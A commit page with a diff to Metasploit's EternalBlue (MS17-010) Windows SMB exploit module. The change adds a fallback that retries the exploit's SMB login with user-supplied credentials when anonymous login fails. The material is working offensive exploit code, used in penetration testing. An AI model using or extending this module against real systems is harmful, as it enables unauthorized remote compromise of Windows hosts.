added credentialed fallback

if anonymous login is blocked, then the user can supply credentials for the exploit to try as a fallback
2017-05-24 16:09:51 -05:00 · 2017-05-24 16:09:51 -05:00 · 4c02b7b13a
parent dc67fcd5a8
commit 4c02b7b13a
1 changed files with 33 additions and 3 deletions
--- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb
+++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb
@ -5,6 +5,7 @@

 require 'ruby_smb'
 require 'ruby_smb/smb1/packet'
+require 'windows_error'

 class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking
@ -27,13 +28,19 @@ class MetasploitModule < Msf::Exploit::Remote
        This exploit, like the original may not trigger 100% of the time, and should be
        run continuously until triggered. It seems like the pool will get hot streaks
        and need a cool down period before the shells rain in again.
+
+        The module will attempt to use Anonymous login to authenticate to perform the
+        exploit. If Anonymous login fails and credentials have been supplied via the
+        SMBUser, SMBPass, and SMBDomain datastore options, then it will try the exploit
+        again with those credentials.
      },

      'Author'         => [
        'Sean Dillon <sean.dillon@risksense.com>',  # @zerosum0x0
        'Dylan Davis <dylan.davis@risksense.com>',  # @jennamagius
        'Equation Group',
-        'Shadow Brokers'
+        'Shadow Brokers',
+        'thelightcosine'  # RubySMB refactor and Fallback Credential mode
       ],
      'License'        => MSF_LICENSE,
      'References'     =>
@ -85,7 +92,10 @@ class MetasploitModule < Msf::Exploit::Remote
        OptInt.new( 'GroomAllocations', [ true,  "Initial number of times to groom the kernel pool.", 12 ] ),
        OptInt.new( 'GroomDelta', [ true,  "The amount to increase the groom count by per try.", 5 ] ),
        OptBool.new( 'VerifyTarget', [ true,  "Check if remote OS matches exploit Target.", true ] ),
-        OptBool.new( 'VerifyArch', [ true,  "Check if remote architecture matches exploit Target.", true ] )
+        OptBool.new( 'VerifyArch', [ true,  "Check if remote architecture matches exploit Target.", true ] ),
+        OptString.new('SMBUser', [ false, '(Fallback) The username to authenticate as', '']),
+        OptString.new('SMBPass', [ false, '(Fallback) The password for the specified username', '']),
+        OptString.new('SMBDomain',  [ false, '(Fallback) The Windows domain to use for authentication', '.']),
      ])
  end

@ -283,7 +293,27 @@ class MetasploitModule < Msf::Exploit::Remote
    sock = connect(false)
    dispatcher = RubySMB::Dispatcher::Socket.new(sock)
    client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '')
-    client.login
+    response_code = client.login
+
+    unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
+      if datastore['SMBUser'].present? && datastore['SMBPass'].present?
+        client = RubySMB::Client.new(
+          dispatcher,
+          smb1: true,
+          smb2: false,
+          username: datastore['SMBUser'],
+          password: datastore['SMBPass'],
+          domain: datastore['SMBDomain']
+        )
+        response_code = client.login
+
+        unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS
+          raise RubySMB::Error::UnexpectedStatusCode, "Error with credentialed login: #{response_code.to_s}"
+        end
+      else
+        raise RubySMB::Error::UnexpectedStatusCode, "Error with anonymous login: #{response_code.to_s}"
+      end
+    end
    os = client.peer_native_os
    tree = client.tree_connect("\\\\#{datastore['RHOST']}\\IPC$")